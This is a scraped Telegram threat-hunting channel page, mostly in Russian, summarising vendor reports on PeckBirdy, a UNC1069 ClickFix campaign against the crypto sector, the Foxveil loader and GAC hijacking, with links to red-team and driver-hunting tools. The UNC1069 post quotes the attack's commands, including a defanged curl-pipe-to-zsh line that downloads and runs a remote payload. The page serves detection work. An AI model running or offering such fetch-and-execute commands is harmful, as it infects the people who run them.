Threat Hunting Father 🦔
3.03K subscribers
774 photos
22 videos
33 files
594 links
• All about Threat Hunting, detecting malicious activity.
• We try to see interesting APT, TTP, instruments and features of systems, what use attacker’s
For educational purposes only🧠
https://t.me/boost/ThreatHuntingFather
Download Telegram
PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups

Trend Micro выявила JScript-фреймворк командного управления (C&C) под названием PeckBirdy, который активно используется прокитайскими APT-акторами с 2023 года. Фреймворк разработан для гибкого развёртывания в различных средах, включая браузеры, MSHTA, WScript и NodeJS, за счёт злоупотребления living-off-the-land бинарями (LOLBins). PeckBirdy выполняет несколько ролей на протяжении всей цепочки атаки - от начального доступа через watering-hole-атаки до бокового перемещения и управления бэкдорами по C&C-каналу.
Задокументированы две основные кампании, использующие PeckBirdy: SHADOW-VOID-044 и SHADOW-EARTH-045. Кампания SHADOW-VOID-044 нацелена на китайскую индустрию онлайн-гемблинга и разворачивает модульные бэкдоры HOLODONUT и MKDOOR. Кампания SHADOW-EARTH-045 ориентирована на государственные и частные организации в Азии, где PeckBirdy применяется для сбора учётных данных и в качестве канала удалённого доступа. В отчёте эти кампании связываются с известными группировками, такими как UNC3569, Earth Baxia и другими, при этом подчёркивается сложная сеть совместно используемых инструментов и инфраструктуры, включая применение похищенных сертификатов для подписи кода.

🔗 https://www.trendmicro.com/en_us/research/26/a/peckbirdy-script-framework.html
🦔THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
4
Вот смотрите, коротко к чему приводит Threat Hunting 😃 💊

Решая нетривиальную задачу в атакованной сети, человек просто идет и пишет тул как настоящий блэкхэт, так как зона мониторинга может быть ограничена, только вот он ищет пивот поинты APT, а не нацелен на файлики и конф. данные.
#IncidentResponce #ThreatHunting

Тулза вот доступна тут:
🔗 https://github.com/s0ld13rr/tarahunter

Автор 🎩:
https://t.me/s0ld13r_ch/352
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥4😁4
UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering

Хороший заголовок? 😃
UNC1069 провёл целевую атаку на представителя криптосектора через социальную инженерию. Жертву завели в фейковую Zoom-встречу через скомпрометированный Telegram-аккаунт, имитировали проблемы со звуком и применили ClickFix - запуск «диагностических» команд привёл к заражению macOS

system_profiler SPAudioData
softwareupdate --evaluate-products --products audio --agree-to-license
curl -A audio -s hxxp://mylingocoin[.]com/audio/fix/6454694440 | zsh
system_profiler SPSoundCardData
softwareupdate --evaluate-products --products soundcard
system_profiler SPSpeechData
softwareupdate --evaluate-products --products speech --agree-to-license


После выполнения команд был развернут многоступенчатый тулчейн: WAVESHAPER → HYPERCALL → HIDDENCALL / SUGARLOADER / SILENCELIFT, а затем два стилера - DEEPBREATH (TCC bypass, Keychain, браузеры, Telegram, Notes) и CHROMEPUSH (Chromium-extension, cookies, keylogging). Цель - массовый сбор учётных данных и сессий для финансовой кражи и последующих атак.

Но самое интересное из этого текста мы говорит не восстановили AI, но чет похожее видели, как по вашему это норм или стрем? 😃

While Mandiant was unable to recover forensic evidence to independently verify the use of AI models in this specific instance, the reported ruse is similar to a previously publicly reported incident with similar characteristics, where deepfakes were also allegedly used.


🔗 https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
51
Foxveil – New Malware Loader Abusing Cloudflare, Discord, and Netlify as Staging Infrastructure

Foxveil - initial-stage loader, активен с августа 2025. Использует Cloudflare Pages, Netlify и Discord attachments как staging вместо собственного C2.

Цепочка
Запуск вредоносного EXE/DLL.
• Загрузка shellcode (часто Donut) с:
*.pages.dev
*.netlify.app
Discord attachment
• Инжект и выполнение в памяти.

Разница версий
v1

• Спавнит fake svchost.exe
• Early Bird APC injection
• Persistence через регистрацию сервиса (AarSvc)
• Дроп в C:\Windows\SysWOW64\
Runtime string mutation
v2
• Чаще получает shellcode через Discord
• Self-injection
• WMI-вызов к Defender:
MSFT_MpPreference RemoveExclusionPath

Дроп в SysWOW64

Маскировка payload’ов
Файлы пишутся как:
sms.exe
sihost.exe
taskhostw.exe
taskhostw1.exe
audiodg.exe
real1.exe
real2.exe

Имена имитируют системные процессы, happy hunting 🤩

🔗 https://www.catonetworks.com/blog/cato-ctrl-foxveil-new-malware/
🦔THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
3
This media is not supported in your browser
VIEW IN TELEGRAM
GAC вещичка которую можно было видеть в разных APT компаниях в частности абуз IIS

Global Assembly Cache is a system-wide repository in the .NET framework that stores strong named (name + version + culture + public key token identity) assemblies so multiple applications can use themSwithout version conflicts. On Windows systems, GAC is typically under %windir%\Microsoft.NET\assembly, and assemblies stored there are intended to be globally available to CLR-hosting processes (services, IIS, desktop applications etc.). Threat actors with elevated privileges on the asset could tamper, an assembly inside the GAC folder to execute arbitrary code. The technique could establish persistence by blending into a trusted process.

🔗https://ipurple.team/2026/02/10/gac-hijacking/
🦔
Please open Telegram to view this post
VIEW IN TELEGRAM
62
Red Team вооружается все больше, а это значит что тест инфраструктуры будет становиться еще ниже радаров и просто так этих ребят без ТН мало XDR решений подсветит 😃

Rust based
Generate DLL proxy/sideload projects. Automatically parses PE export tables and generates ready-to-compile project for red team engagements.

LazyDLLSideload automates the process of creating DLL proxying and sideloading implants. It:
• windows_sys Ecosystem.
• Parses any Windows DLL to extract exported functions
• Generates complete Rust projects
Supports two operation modes: • Sideload and Proxy
• Uses dyncvoke for dynamic invocation and syscall execution..

Минимальный набор hunting-пивотов:
Process → ImageLoad: процесс X грузит DLL Y из user-writable/неожидаемого каталога.
FileCreate → ProcessStart: DLL появилась в каталоге приложения → затем старт/рестарт приложения

Может быть и так что будут подкладывать DLL с одинаковым именем, но это уже другая механика.

🔗 https://github.com/Whitecat18/LazyDLLSideload/tree/main
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
15
BYOVD hunter - да да, с помощью этого инструмента можно найти уязвимые драйвера, но мы то будем использовать чтобы провести аудит своего хоста? 😃

🔗https://github.com/BlackSnufkin/HolyGrail
🦔
Используем на свой страх и риск, другой способ идти на LoLdrivers
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4🥱11